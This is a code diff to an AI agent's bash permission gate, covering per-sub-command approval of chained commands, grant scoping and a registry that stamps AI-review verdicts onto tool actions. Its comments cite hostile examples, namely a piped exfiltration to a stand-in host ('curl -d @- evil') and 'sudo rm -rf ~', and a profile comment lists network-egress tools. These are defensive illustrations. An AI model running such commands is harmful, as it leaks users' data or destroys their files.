+    # the prompt can still list everything that needs approval.
+    forced = [s for s in ask_segments if s.safety_forced]
+    rep = forced[0] if forced else max(ask_segments, key=lambda s: _ASK_SEVERITY.get(s.source, 0))
     return BashRuleDecision(
         level=PermissionLevel.ASK,
-        source=rep.source,
-        matched_pattern=rep.matched_pattern,
-        reason=f"Pipeline requires confirmation: {rep.reason}",
+        source=BashDecisionSource.SAFETY if forced else rep.source,
+        matched_pattern=None if forced else rep.matched_pattern,
+        reason=f"Requires confirmation: {rep.reason}",
         bucket=rep.bucket,
-        safety_forced=False,
-        segment_ask_patterns=tuple((d.source, d.matched_pattern) for d in non_allow),
+        safety_forced=bool(forced),
+        ask_segments=ask_segments,
     )
 
 
 def evaluate_bash_command(command: str, rules: BashCommandRules) -> BashRuleDecision:
     """Evaluate a bash command against a ruleset.
 
-    Routes pure pipelines (``a | b | c``) through per-segment judging so a
-    pipeline of allow-listed read-only commands can auto-run, while any other
-    shell construct (``&&``, ``;``, ``$()``, redirection, ``||``) falls to the
-    safety ceiling. See the module docstring for the full decision order.
+    Routes chained commands (``a | b``, ``a && b``, ``a; b``, ``a || b``)
+    through per-sub-command judging so a chain of allow-listed read-only
+    commands can auto-run and an ASK names every sub-command involved, while
+    un-segmentable shell constructs (``$()``, backticks, redirection,
+    background ``&``, newlines) fall to the safety ceiling. See the module
+    docstring for the full decision order.
     """
-    # Empty / whitespace-only input has no pipeline structure to speak of;
+    # Empty / whitespace-only input has no chain structure to speak of;
     # let the single-command path return the UNPARSEABLE decision.
     if not command.strip():
-        return _evaluate_single_command(command, rules)
+        return _with_ask_segments(command, _evaluate_single_command(command, rules))
 
-    segments = split_pipeline(command)
+    segments = split_command_chain(command)
     if segments is None:
-        # Malformed pipeline (``||``, ``|&``, empty segment, unbalanced quotes).
-        # Unbalanced quotes make shlex raise → route to the single-command path
-        # so the decision is UNPARSEABLE; everything else is an un-analyzable
-        # shell construct → safety ceiling.
+        # Not segmentable (``|&``, background ``&``, empty segment, unbalanced
+        # quotes). Unbalanced quotes make shlex raise → route to the
+        # single-command path so the decision is UNPARSEABLE; everything else
+        # is an un-analyzable shell construct → safety ceiling.
         try:
             shlex.split(command)
         except ValueError:
-            return _evaluate_single_command(command, rules)
-        return BashRuleDecision(
-            level=PermissionLevel.ASK,
-            source=BashDecisionSource.SAFETY,
-            matched_pattern=None,
-            reason="Command contains shell metacharacters",
-            bucket=command.strip().split()[0],
-            safety_forced=True,
+            return _with_ask_segments(command, _evaluate_single_command(command, rules))
+        return _with_ask_segments(
+            command,
+            BashRuleDecision(
+                level=PermissionLevel.ASK,
+                source=BashDecisionSource.SAFETY,
+                matched_pattern=None,
+                reason="Command contains shell metacharacters",
+                bucket=command.strip().split()[0],
+                safety_forced=True,
+            ),
         )
     if len(segments) == 1:
-        return _evaluate_single_command(segments[0], rules)
-    return _evaluate_pipeline(command, segments, rules)
+        return _with_ask_segments(segments[0], _evaluate_single_command(segments[0], rules))
+    return _evaluate_chain(segments, rules)
 
 
 # Complete PermissionConfig's forward reference when this module loaded first

--- a/datus/tools/permission/permission_hooks.py
+++ b/datus/tools/permission/permission_hooks.py
@@ -29,6 +29,7 @@ from agents.lifecycle import AgentHooks
 from datus.cli.execution_state import InteractionBroker, InteractionCancelled
 from datus.schemas.interaction_event import InteractionEvent
 from datus.tools.func_tool.fs_path_policy import PathAllowlist, PathZone, classify_path
+from datus.tools.permission import review_registry
 from datus.tools.permission.bash_classifier import BashClassifierContext
 from datus.tools.permission.bash_rules import (
     BashDecisionSource,
@@ -454,6 +455,37 @@ class PermissionHooks(AgentHooks):
             f"AI review classified the action as {verdict.risk_level.value} risk "
             f"with {verdict.user_authorization.value} user authorization: {verdict.rationale}"
         )
+
+    @staticmethod
+    def _record_review(
+        context: Any,
+        verdict: Optional["AutoReviewVerdict"],
+        config: Any,
+        outcome: str,
+    ) -> None:
+        """Publish a review outcome for the tool action this call will produce.
+
+        Keyed by the SDK's ``tool_call_id`` so whoever builds the completed
+        ``ActionHistory`` for the same call can stamp it into ``output`` (see
+        ``review_registry``). Silent when review is disabled — the CLI must not
+        claim a review happened when none did.
+        """
+        if not getattr(config, "enabled", False):
+            return
+        payload: Dict[str, Any] = {"outcome": outcome}
+        if verdict is None:
+            # No rationale to report — the renderer's "unavailable" marker says
+            # it once; a canned sentence here would just repeat it on the row.
+            payload["decision"] = "unavailable"
+        else:
+            payload.update(
+                decision=verdict.decision.value,
+                risk_level=verdict.risk_level.value,
+                user_authorization=verdict.user_authorization.value,
+                confidence=verdict.confidence,
+                rationale=verdict.rationale,
+            )
+        review_registry.record(getattr(context, "tool_call_id", None), payload)
 
     # Plan-mode tooling is always allowed regardless of permission profile:
     # ``confirm_plan`` already runs its own user interaction, and ``todo_*``
@@ -1050,6 +1082,7 @@ class PermissionHooks(AgentHooks):
                 verdict.risk_level.value,
                 verdict.confidence,
             )
+            self._record_review(context, verdict, review_config, "auto_allowed")
             return True
 
         if self.non_interactive:
@@ -1082,6 +1115,8 @@ class PermissionHooks(AgentHooks):
                 review_verdict=verdict,
                 review_enabled=review_config.enabled,
             )
+            if choice in ("y", "a") or (choice == "p" and offer_project):
+                self._record_review(context, verdict, review_config, "user_approved")
             if choice == "y":
                 logger.info("User approved execute_sql (%s, once)", kind)
                 return True
@@ -1375,6 +1410,7 @@ class PermissionHooks(AgentHooks):
                     review_verdict.confidence,
                     command,
                 )
+                self._record_review(context, review_verdict, review_config, "auto_allowed")
                 return True
 
         # Backwards-compatible injection seam used by existing embedders and
@@ -1444,6 +1480,11 @@ class PermissionHooks(AgentHooks):
                 review_verdict=review_verdict,
                 review_enabled=bool(review_config and review_config.enabled),
             )
+            if choice in ("y", "a") or (choice == "p" and offer_project):
+                # The reviewer flagged this (or could not decide) and the user
+                # overrode it — record that so the tool action shows both the
+                # verdict and who actually authorised the run.
+                self._record_review(context, review_verdict, review_config, "user_approved")
             if choice == "y":
                 logger.info("User approved bash command (once): %s", command)
                 return True

--- a/datus/tools/permission/permission_hooks.py
+++ b/datus/tools/permission/permission_hooks.py
@@ -33,6 +33,7 @@ from datus.tools.permission.bash_classifier import BashClassifierContext
 from datus.tools.permission.bash_rules import (
     BashDecisionSource,
     BashRuleDecision,
+    BashSegmentDecision,
     evaluate_bash_command,
 )
 from datus.tools.permission.permission_config import PermissionLevel, classify_sql_kind
@@ -113,6 +114,26 @@ def _get_permission_prompt_lock(broker: Any = None) -> asyncio.Lock:
 # line. Nothing is truncated — the InteractionApp already pages long content
 # (Shift+Up/Down) and opens it in a pager (``v``).
 _INLINE_ARG_MAX = 80
+
+# A bash confirmation choice names the buckets/patterns it grants, up to this
+# many; beyond that the label degrades to a count. The full per-sub-command
+# breakdown always lives in the prompt body, which the TUI pages rather than
+# truncates, so a long chain never hides what is being approved.
+_MAX_LABELLED_SEGMENTS = 3
+
+
+def _inline_code(text: str) -> str:
+    """Wrap ``text`` in a markdown code span that survives backticks inside it.
+
+    Bash commands routinely contain backticks (``echo `whoami```), which would
+    otherwise close the span early and mangle the permission prompt. CommonMark
+    lets a span use N backticks to hold a run of N-1, plus one space of padding
+    when the content itself starts or ends with a backtick.
+    """
+    longest = max((len(run) for run in re.findall(r"`+", text)), default=0)
+    fence = "`" * (longest + 1)
+    pad = " " if text.startswith("`") or text.endswith("`") else ""
+    return f"{fence}{pad}{text}{pad}{fence}"
 
 
 def _format_tool_args_markdown(args: dict) -> str:
@@ -1197,20 +1218,29 @@ class PermissionHooks(AgentHooks):
         user agent.yml rules + project ``.datus/config.yml`` allows — see
         ``bash_rules.evaluate_bash_command`` for the deny-first decision order).
 
+        Chained commands (``a | b``, ``a && b``, ``a; b``, ``a || b``) are
+        judged per sub-command by ``evaluate_bash_command``; ``decision.
+        ask_segments`` carries EVERY sub-command that needs approval, and the
+        prompt, the session cache and the project grants all operate on that
+        whole set rather than on one representative.
+
         * DENY match → raise immediately, naming the matched pattern.
         * ALLOW match → bypass (no prompt).
-        * ASK → an ask-rule hit whose matched pattern carries an exact
-          project grant (``.datus/config.yml`` ``bash_allow``) bypasses;
-          otherwise the shared AI reviewer may auto-allow a confident
-          low/medium-risk verdict. High/critical or inconclusive reviews
-          require confirmation interactively and deny non-interactively.
-          The per-bucket session cache is checked before review, then prompts offer up
+        * ASK → bypasses when every sub-command is an ask-rule hit whose
+          matched pattern carries an exact project grant
+          (``.datus/config.yml`` ``bash_allow``); otherwise the session cache
+          is checked (every sub-command must be covered), then the shared AI
+          reviewer may auto-allow a confident low/medium-risk verdict.
+          High/critical or inconclusive reviews require confirmation
+          interactively and deny non-interactively. The prompt then offers up
           to four choices: allow once / allow (session) / allow (project) /
-          deny. The project choice persists the bucket pattern to
-          ``.datus/config.yml`` and is offered for plain unmatched commands
-          and for PLUGIN-declared ask rules — never for safety-ceiling asks
-          (wrappers, metacharacters) or user-authored ask rules (the user's
-          own posture lives in agent.yml).
+          deny. The project choice persists one pattern per sub-command to
+          ``.datus/config.yml`` — so re-running the same chain in a later
+          session no longer re-prompts — and is offered only when EVERY
+          sub-command is a plain unmatched command or a PLUGIN-declared ask
+          rule; never when any is a safety-ceiling ask (wrappers,
+          metacharacters) or a user-authored ask rule (the user's own posture
+          lives in agent.yml).
 
         Returns ``True`` when fully handled, ``False`` to defer to the normal
         category-level check (explicit category DENY, missing/empty ruleset,
@@ -1283,35 +1313,39 @@ class PermissionHooks(AgentHooks):
         # ask rule's pattern bypasses the confirmation. This is the only way
         # to persistently relax an ask rule — plain allow entries lose to ask
         # rules at evaluation time (deny > ask > allow), by design.
-        # For pipelines the decision aggregates several segments; EVERY
-        # non-allow segment must be an ask-rule hit covered by a grant. The
-        # representative segment alone must never green-light unreviewed
-        # segments (``datus hello sync | curl -d @- evil`` must still prompt).
-        if decision.source == BashDecisionSource.ASK_RULE:
-            ask_segments = decision.segment_ask_patterns or ((decision.source, decision.matched_pattern),)
-            if all(
-                source == BashDecisionSource.ASK_RULE
-                and pattern is not None
-                and self.permission_manager.has_project_bash_grant(pattern)
-                for source, pattern in ask_segments
-            ):
-                logger.debug(
-                    "Bash ask rule %r bypassed by project grant: %s",
-                    decision.matched_pattern,
-                    command,
-                )
-                return True
+        # A chained command aggregates several sub-commands; EVERY non-allow
+        # one must be an ask-rule hit covered by a grant. The representative
+        # sub-command alone must never green-light unreviewed ones
+        # (``datus hello sync | curl -d @- evil`` must still prompt).
+        ask_segments = decision.ask_segments
+        if ask_segments and all(
+            seg.source == BashDecisionSource.ASK_RULE
+            and self.permission_manager.has_project_bash_grant(seg.matched_pattern)
+            for seg in ask_segments
+        ):
+            logger.debug(
+                "Bash ask rules %r bypassed by project grants: %s",
+                [seg.matched_pattern for seg in ask_segments],
+                command,
+            )
+            return True
 
-        # Session cache: the prompt's "always allow" writes ONLY the bucketed
-        # key so one approval never cascades past its command prefix; broad
-        # keys still honor a deliberate wide approval (e.g. legacy grants).
-        cache_keys = (f"bash_tools.bash::{decision.bucket}", "bash_tools.bash", "bash_tools.*")
+        # Session cache: the prompt's "always allow" writes one key PER
+        # sub-command, and re-running is allowed only when EVERY sub-command is
+        # covered — approving ``a && b`` must not silently green-light
+        # ``a && c``. Broad keys still honor a deliberate wide approval (e.g.
+        # legacy grants).
+        segment_keys = tuple(dict.fromkeys(self._segment_session_key(seg) for seg in decision.ask_segments))
+        broad_keys = ("bash_tools.bash", "bash_tools.*")
 
         def _session_approved() -> bool:
-            return any(self.permission_manager._session_approvals.get(key) for key in cache_keys)
+            approvals = self.permission_manager._session_approvals
+            if any(approvals.get(key) for key in broad_keys):
+                return True
+            return bool(segment_keys) and all(approvals.get(f"bash_tools.{key}") for key in segment_keys)
 
         if _session_approved():
-            logger.debug("Bash bucket %r already approved for session", decision.bucket)
+            logger.debug("Bash sub-commands %r already approved for session", segment_keys)
             return True
 
         # Unlike the old reserved classifier seam, the shared reviewer can
@@ -1387,18 +1421,20 @@ class PermissionHooks(AgentHooks):
                 return True
             # Project persistence is offered for plain unmatched commands and
             # for PLUGIN-declared ask rules (third-party defaults the user may
-            # relax per project). Never for safety-ceiling asks, and not for
-            # user-authored ask rules — the user's own posture lives in their
-            # agent.yml, not behind a one-keypress override.
+            # relax per project). Never when ANY sub-command is a safety-ceiling
+            # ask, and not for user-authored ask rules — the user's own posture
+            # lives in their agent.yml, not behind a one-keypress override.
             offer_project = (
                 self.config_mutable
-                and not decision.safety_forced
-                and (
-                    decision.source == BashDecisionSource.DEFAULT
+                and bool(decision.ask_segments)
+                and not any(seg.safety_forced for seg in decision.ask_segments)
+                and all(
+                    seg.source == BashDecisionSource.DEFAULT
                     or (
-                        decision.source == BashDecisionSource.ASK_RULE
-                        and self.permission_manager.is_plugin_ask_pattern(decision.matched_pattern)
+                        seg.source == BashDecisionSource.ASK_RULE
+                        and self.permission_manager.is_plugin_ask_pattern(seg.matched_pattern)
                     )
+                    for seg in decision.ask_segments
                 )
             )
             choice = await self._request_bash_confirmation(
@@ -1412,28 +1448,21 @@ class PermissionHooks(AgentHooks):
                 logger.info("User approved bash command (once): %s", command)
                 return True
             if choice == "a":
-                self.permission_manager.approve_for_session("bash_tools", f"bash::{decision.bucket}")
-                logger.info("User approved bash bucket %r for session", decision.bucket)
+                self._approve_segments_for_session(segment_keys)
+                logger.info("User approved bash sub-commands %r for session", segment_keys)
                 return True
             if choice == "p" and offer_project:
-                # Ask-rule hits persist the EXACT matched pattern: the grant
-                # bypass above checks strict equality with matched_pattern, so
-                # suffixing ``:*`` onto a colon-free (exact) plugin pattern
-                # would persist a grant that never fires. Unmatched (DEFAULT)
-                # commands keep the prefix-widened bucket pattern, which takes
-                # effect through allow-rule evaluation instead.
-                if decision.source == BashDecisionSource.ASK_RULE and decision.matched_pattern:
-                    pattern = decision.matched_pattern
-                else:
-                    pattern = self._bucket_to_allow_pattern(decision.bucket)
-                persisted = self.permission_manager.add_project_bash_allow(pattern, self.project_root)
-                # Session bucket too, so later same-bucket calls this session
+                patterns = tuple(dict.fromkeys(self._segment_allow_pattern(seg) for seg in decision.ask_segments))
+                failed = [
+                    p for p in patterns if not self.permission_manager.add_project_bash_allow(p, self.project_root)
+                ]
+                # Session keys too, so later same-bucket calls this session
                 # skip the prompt even though global_config already allows them.
-                self.permission_manager.approve_for_session("bash_tools", f"bash::{decision.bucket}")
+                self._approve_segments_for_session(segment_keys)
                 logger.info(
                     "User granted project-level bash allow %r%s",
-                    pattern,
-                    "" if persisted else " (disk write failed; session-only)",
+                    list(patterns),
+                    "" if not failed else f" (disk write failed for {failed}; session-only)",
                 )
                 return True
             logger.info("User rejected bash command: %s", command)
@@ -1443,6 +1472,49 @@ class PermissionHooks(AgentHooks):
                 tool_name="bash",
             )
 
+    def _approve_segments_for_session(self, segment_keys: Tuple[str, ...]) -> None:
+        """Record a session approval for every sub-command of one prompt."""
+        for key in segment_keys:
+            self.permission_manager.approve_for_session("bash_tools", key)
+
+    @staticmethod
+    def _segment_session_key(segment: BashSegmentDecision) -> str:
+        """Session-approval key (sans category) for one sub-command.
+
+        A safety-forced sub-command's bucket does NOT describe what actually
+        runs — ``sudo ls`` and ``sudo rm -rf ~`` share the bucket ``sudo``, and
+        ``bash -c <anything>`` shares ``bash``. Keying those on the verbatim
+        sub-command keeps an approval from leaking onto a different command
+        that happens to start the same way.
+        """
+        if segment.safety_forced:
+            return f"bash::exact:{segment.command}"
+        return f"bash::{segment.bucket}"
+
+    @staticmethod
+    def _segment_session_label(segment: BashSegmentDecision) -> str:
+        """What a session grant on ``segment`` actually covers, for the label.
+
+        Mirrors :meth:`_segment_session_key`: a safety-forced sub-command is
+        granted verbatim, so showing its bucket (``sudo``) would promise the
+        user far more than the grant delivers.
+        """
+        return segment.command if segment.safety_forced else segment.bucket
+
+    def _segment_allow_pattern(self, segment: BashSegmentDecision) -> str:
+        """Persistable ``bash_allow`` pattern for one sub-command.
+
+        Ask-rule hits persist the EXACT matched pattern: the grant bypass in
+        ``_handle_bash_permission`` checks strict equality with
+        ``matched_pattern``, so suffixing ``:*`` onto a colon-free (exact)
+        plugin pattern would persist a grant that never fires. Unmatched
+        (DEFAULT) commands keep the prefix-widened bucket pattern, which takes
+        effect through allow-rule evaluation instead.
+        """
+        if segment.source == BashDecisionSource.ASK_RULE and segment.matched_pattern:
+            return segment.matched_pattern
+        return self._bucket_to_allow_pattern(segment.bucket)
+
     @staticmethod
     def _bucket_to_allow_pattern(bucket: str) -> str:
         """Convert a session bucket into a persistable allow pattern.
@@ -1451,6 +1523,31 @@ class PermissionHooks(AgentHooks):
         that is already a rule pattern (contains ``:``) is used verbatim.
         """
         return bucket if ":" in bucket else f"{bucket}:*"
+
+    def _format_bash_prompt_content(self, command: str, decision: BashRuleDecision) -> str:
+        """Markdown body for the bash confirmation prompt.
+
+        A single sub-command keeps the original one-reason layout. A chain
+        lists EVERY sub-command that needs approval, so the user sees what the
+        session/project grant actually covers instead of one representative.
+        """
+        header = f"### Bash Command Permission\n\n```bash\n{command}\n```\n\n"
+        segments = decision.ask_segments
+        if len(segments) <= 1:
+            return f"{header}**Reason:** {decision.reason}\n"
+        lines = "\n".join(f"{i}. {_inline_code(seg.command)} — {seg.reason}" for i, seg in enumerate(segments, start=1))
+        return f"{header}**{len(segments)} sub-commands require confirmation:**\n\n{lines}\n"
+
+    @staticmethod
+    def _format_scope_label(labels: Tuple[str, ...], scope: str) -> str:
+        """Choice label naming what a session/project grant will cover.
+
+        Rendered as plain text by the TUI, so no markdown escaping here.
+        """
+        if len(labels) <= _MAX_LABELLED_SEGMENTS:
+            quoted = ", ".join("'{}'".format(label) for label in labels)
+            return f"Allow {quoted} ({scope})"
+        return f"Allow all {len(labels)} sub-commands ({scope})"
 
     async def _request_bash_confirmation(
         self,
@@ -1466,7 +1563,7 @@ class PermissionHooks(AgentHooks):
         Unlike ``_request_user_confirmation`` (bool), callers need the concrete
         choice to distinguish session from project grants.
         """
-        content = f"### Bash Command Permission\n\n```bash\n{command}\n```\n\n**Reason:** {decision.reason}\n"
+        content = self._format_bash_prompt_content(command, decision)
         if review_verdict is not None:
             content += (
                 f"**AI review:** `{review_verdict.risk_level.value}` risk, "
@@ -1475,13 +1572,16 @@ class PermissionHooks(AgentHooks):
             )
         elif review_enabled:
             content += "**AI review:** unavailable or inconclusive — manual confirmation required\n"
-        allow_pattern = self._bucket_to_allow_pattern(decision.bucket)
+        labels = tuple(dict.fromkeys(self._segment_session_label(seg) for seg in decision.ask_segments)) or (
+            decision.bucket,
+        )
         choices = {
             "y": "Allow (once)",
-            "a": f"Allow '{decision.bucket}' (session)",
+            "a": self._format_scope_label(labels, "session"),
         }
         if offer_project:
-            choices["p"] = f"Allow '{allow_pattern}' (project)"
+            patterns = tuple(dict.fromkeys(self._segment_allow_pattern(seg) for seg in decision.ask_segments))
+            choices["p"] = self._format_scope_label(patterns, "project")
         choices["n"] = "Deny"
 
         try:

--- a/datus/tools/permission/profiles.py
+++ b/datus/tools/permission/profiles.py
@@ -185,9 +185,13 @@ _NORMAL_RULES = [
 #   * curl / wget / nc / ssh — network egress.
 #   * rm / mv / cp / mkdir / touch / chmod — filesystem writes (mkdir/touch
 #     move to ``auto`` below).
-# Wrappers (bash -c, sudo, xargs, env, ...) and any non-pipe metacharacter
-# command are force-ASKed by the safety ceiling in ``evaluate_bash_command``
-# regardless of this list. Tunable via ``permissions.bash_commands``.
+# Wrappers (bash -c, sudo, xargs, env, ...), compound constructs (loops,
+# subshells) and any residual metacharacter command ($(), redirection,
+# background &) are force-ASKed by the safety ceiling in
+# ``evaluate_bash_command`` regardless of this list. Note that a command
+# chained with ``|``/``&&``/``||``/``;`` is judged per sub-command, so a chain
+# built purely from this list auto-runs.
+# Tunable via ``permissions.bash_commands``.
 _NORMAL_BASH_ALLOW = [
     # environment / identity info
     "pwd",

--- a/datus/tools/permission/review_registry.py
+++ b/datus/tools/permission/review_registry.py
@@ -1,0 +1,125 @@
+# Copyright 2025-present DatusAI, Inc.
+# Licensed under the Apache License, Version 2.0.
+# See http://www.apache.org/licenses/LICENSE-2.0 for details.
+
+"""Hand-off of AI review verdicts from the permission gate to the tool action.
+
+``PermissionHooks`` reviews a planned bash/SQL action in ``on_tool_start``,
+long before the tool's completed ``ActionHistory`` exists. This module is the
+seam between the two: the gate records a verdict keyed by ``tool_call_id``, and
+whoever builds the completed action for that same call stamps it into
+``output["permission_review"]`` (see ``PERMISSION_REVIEW_OUTPUT_KEY``).
+
+Keying works because every producer of a finished tool action uses the same
+``complete_{call_id}`` id convention (``openai_compatible``, ``claude_model``,
+``codex_model``, ``bash_mode``), and ``call_id`` is exactly the SDK's
+``ToolContext.tool_call_id`` handed to the gate.
+
+Entries are consumed once (:func:`take`). The registry is bounded and evicts
+oldest-first so an abandoned entry — a review whose tool never ran because the
+user denied it, or a call id the producer never completed — cannot accumulate.
+"""
+
+from collections import OrderedDict
+from threading import Lock
+from typing import Any, Dict, Optional
+
+from datus.utils.loggings import get_logger
+
+logger = get_logger(__name__)
+
+# Key under which the verdict is stamped into a tool action's ``output``.
+PERMISSION_REVIEW_OUTPUT_KEY = "permission_review"
+
+# Reviews are consumed by the very next completed action for the same call, so
+# the live set is normally 0-1 entries. The cap only bounds pathological cases
+# (denied calls, producers that never complete) and is far above any real
+# concurrent tool fan-out.
+_MAX_PENDING = 256
+
+_pending: "OrderedDict[str, Dict[str, Any]]" = OrderedDict()
+_lock = Lock()
+
+
+def record(call_id: Optional[str], payload: Optional[Dict[str, Any]]) -> None:
+    """Store the review outcome for ``call_id``; no-op on missing inputs.
+
+    Re-recording the same call id overwrites: the gate refines ``outcome``
+    (``auto_allowed`` → ``user_approved``) after the user answers a prompt.
+    """
+    if not call_id or not payload:
+        return
+    with _lock:
+        _pending[call_id] = payload
+        _pending.move_to_end(call_id)
+        while len(_pending) > _MAX_PENDING:
+            evicted, _ = _pending.popitem(last=False)
+            logger.debug("Evicted unconsumed permission review for call %s", evicted)
+
+
+def take(call_id: Optional[str]) -> Optional[Dict[str, Any]]:
+    """Pop the review recorded for ``call_id``, or ``None`` when there is none."""
+    if not call_id:
+        return None
+    with _lock:
+        return _pending.pop(call_id, None)
+
+
+def clear() -> None:
+    """Drop every pending entry (session teardown, tests)."""
+    with _lock:
+        _pending.clear()
+
+
+def stamp(output: Any, call_id: Optional[str]) -> Any:
+    """Attach the pending review for ``call_id`` to a tool action's ``output``.
+
+    Returns ``output`` unchanged when there is no review, so producers can call
+    this unconditionally. A non-dict ``output`` is wrapped so the verdict is
+    never silently dropped.
+    """
+    review = take(call_id)
+    if review is None:
+        return output
+    if isinstance(output, dict):
+        output[PERMISSION_REVIEW_OUTPUT_KEY] = review
+        return output
+    return {"result": output, PERMISSION_REVIEW_OUTPUT_KEY: review}
+
+
+def call_id_of(action_id: Optional[str]) -> Optional[str]:
+    """Recover the tool ``call_id`` from a completed action's id.
+
+    Every producer names a finished tool action ``complete_{call_id}``; the
+    in-flight frame uses the bare ``call_id``. Both map back to the same key.
+    """
+    if not action_id:
+        return None
+    return action_id[len("complete_") :] if action_id.startswith("complete_") else action_id
+
+
+def enrich_action(action: Any) -> None:
+    """Stamp a pending review onto a completed tool action, in place.
+
+    Registered with ``ActionHistoryManager`` so every model implementation
+    picks this up without knowing the permission layer exists. Only SUCCESS or
+    FAILED tool actions are considered: the PROCESSING frame is emitted before
+    the tool runs and would consume the entry too early, leaving the completed
+    action — the one that persists and gets replayed — without it.
+    """
+    from datus.schemas.action_history import ActionRole, ActionStatus
+
+    if action.role != ActionRole.TOOL or action.status == ActionStatus.PROCESSING:
+        return
+    if isinstance(action.output, dict) and PERMISSION_REVIEW_OUTPUT_KEY in action.output:
+        return
+    call_id = call_id_of(action.action_id)
+    if call_id and _peek(call_id) is None:
+        return
+    action.output = stamp(action.output if action.output is not None else {}, call_id)
+
+
+def _peek(call_id: str) -> Optional[Dict[str, Any]]:
+    """Non-consuming lookup, so a miss never rewrites ``output``."""
+    with _lock:
+        return _pending.get(call_id)

--- a/datus/utils/exceptions.py
+++ b/datus/utils/exceptions.py
@@ -2,6 +2,7 @@
 # Licensed under the Apache License, Version 2.0.
 # See http://www.apache.org/licenses/LICENSE-2.0 for details.
 
+import re
 import sys
 import traceback
 from enum import Enum
@@ -36,7 +37,10 @@ class ErrorCode(Enum):
 
     # Model errors
     MODEL_REQUEST_FAILED = ("300001", "LLM request failed")
-    MODEL_INVALID_RESPONSE = ("300002", "Invalid request format, content, or model response (HTTP 400)")
+    # Covers BOTH a rejected request (provider HTTP 400) and an unusable
+    # response (unparseable / empty model output), so the description must not
+    # name either one — the caller's ``error_detail`` says which it was.
+    MODEL_INVALID_RESPONSE = ("300002", "Invalid request or unusable model response")
     MODEL_TIMEOUT = ("300003", "Model request timeout")
 
     # API errors following Anthropic/OpenAI standards
@@ -206,14 +210,41 @@ class DatusException(Exception):
     def __str__(self):
         return self.message
 
+    @staticmethod
+    def _desc_placeholders(template: str) -> set:
+        """Root names of the ``{...}`` fields in ``template``.
+
+        ``{detail}`` -> ``detail``; ``{err.args[0]}`` -> ``err``, so a nested
+        accessor still counts its argument as consumed.
+        """
+        from string import Formatter
+
+        names = set()
+        for _, field_name, _, _ in Formatter().parse(template):
+            if field_name:
+                names.add(re.split(r"[.\[]", field_name, maxsplit=1)[0])
+        return names
+
     def build_msg(self, message=None, message_args=None):
         if message:
             final_message = message
         elif message_args:
             try:
-                final_message = self.code.desc.format(**message_args)
+                formatted = self.code.desc.format(**message_args)
             except (KeyError, IndexError):
                 final_message = f"{self.code.desc} (args={message_args})"
+            else:
+                # Args the description has no placeholder for used to be
+                # dropped without a trace: ``"...(HTTP 400)".format(
+                # error_detail=<real cause>)`` returns the template unchanged,
+                # so the only diagnostic the caller passed never reached the
+                # log. Append whatever the template did not consume.
+                unused = {k: v for k, v in message_args.items() if k not in self._desc_placeholders(self.code.desc)}
+                if unused:
+                    detail = ", ".join(f"{k}={v}" for k, v in unused.items())
+                    final_message = f"{formatted} ({detail})"
+                else:
+                    final_message = formatted
         else:
             final_message = self.code.desc
         return f"error_code={self.code.code}, error_message={final_message}"

--- a/datus/utils/exceptions.py
+++ b/datus/utils/exceptions.py
@@ -6,6 +6,7 @@ import re
 import sys
 import traceback
 from enum import Enum
+from typing import Any, Dict, Optional
 
 from datus.utils.loggings import get_log_manager, get_logger
 
@@ -211,7 +212,7 @@ class DatusException(Exception):
         return self.message
 
     @staticmethod
-    def _desc_placeholders(template: str) -> set:
+    def _desc_placeholders(template: str) -> set[str]:
         """Root names of the ``{...}`` fields in ``template``.
 
         ``{detail}`` -> ``detail``; ``{err.args[0]}`` -> ``err``, so a nested
@@ -219,13 +220,13 @@ class DatusException(Exception):
         """
         from string import Formatter
 
-        names = set()
+        names: set[str] = set()
         for _, field_name, _, _ in Formatter().parse(template):
             if field_name:
                 names.add(re.split(r"[.\[]", field_name, maxsplit=1)[0])
         return names
 
-    def build_msg(self, message=None, message_args=None):
+    def build_msg(self, message: Optional[str] = None, message_args: Optional[Dict[str, Any]] = None) -> str:
         if message:
             final_message = message
         elif message_args:

--- a/tests/unit_tests/cli/action_display/test_renderers.py
+++ b/tests/unit_tests/cli/action_display/test_renderers.py
@@ -4,6 +4,7 @@
 
 """Unit tests for datus/cli/action_display/renderers.py (ActionRenderer)."""
 
+import json
 import uuid
 from datetime import datetime, timedelta
 from io import StringIO
@@ -1351,3 +1352,72 @@ class TestResolveAssistantBody:
             output_data={"raw_output": LITELLM_EMPTY_PLACEHOLDER, "response": "real body"},
         )
         assert resolve_assistant_body(action) == "real body"
+
+
+class TestPermissionReviewRow:
+    """The AI review row sits above the result, in both compact and verbose."""
+
+    @staticmethod
+    def _action(review, result="added 42 packages"):
+        now = datetime.now()
+        return _make_action(
+            ActionRole.TOOL,
+            ActionStatus.SUCCESS,
+            action_type="bash",
+            messages="bash",
+            input_data={"function_name": "bash", "arguments": {"command": "npm ci"}},
+            output_data={
+                "raw_output": json.dumps({"success": 1, "result": result}),
+                "permission_review": review,
+            },
+            start_time=now,
+            end_time=now + timedelta(seconds=2.3),
+        )
+
+    def test_compact_shows_verdict_above_the_result(self):
+        action = self._action({"decision": "allow", "risk_level": "low", "confidence": 0.92, "rationale": "reversible"})
+        text = _plain(_renderer()._render_main_tool(action, verbose=False))
+
+        assert "AI review ✓ passed" in text
+        assert "reversible" in text
+        assert text.index("AI review") < text.index("added 42 packages")
+
+    def test_compact_flagged_run_names_the_override(self):
+        action = self._action(
+            {"outcome": "user_approved", "decision": "ask", "risk_level": "high", "rationale": "irreversible"}
+        )
+        text = _plain(_renderer()._render_main_tool(action, verbose=False))
+
+        assert "AI review ✗ flagged" in text
+        assert "user approved" in text
+
+    def test_unreviewed_call_renders_no_review_row(self):
+        now = datetime.now()
+        action = _make_action(
+            ActionRole.TOOL,
+            ActionStatus.SUCCESS,
+            action_type="bash",
+            messages="bash",
+            input_data={"function_name": "bash", "arguments": {"command": "npm ci"}},
+            output_data={"raw_output": json.dumps({"success": 1, "result": "ok"})},
+            start_time=now,
+            end_time=now + timedelta(seconds=0.1),
+        )
+        assert "AI review" not in _plain(_renderer()._render_main_tool(action, verbose=False))
+
+    def test_verbose_shows_the_untruncated_rationale(self):
+        rationale = "y" * 300
+        action = self._action({"decision": "allow", "risk_level": "low", "rationale": rationale})
+        text = _plain(_renderer()._render_main_tool(action, verbose=True))
+
+        assert rationale in text.replace("\n", "")
+
+    def test_multiline_output_keeps_its_own_rows(self):
+        """The review row must not be counted as one of the output lines."""
+        action = self._action({"decision": "allow", "rationale": "safe"}, result="\n".join(f"l{i}" for i in range(8)))
+        text = _plain(_renderer()._render_main_tool(action, verbose=False))
+
+        assert "AI review" in text
+        # Three output rows plus the folded remainder, unchanged by the review row.
+        assert "l0" in text and "l2" in text
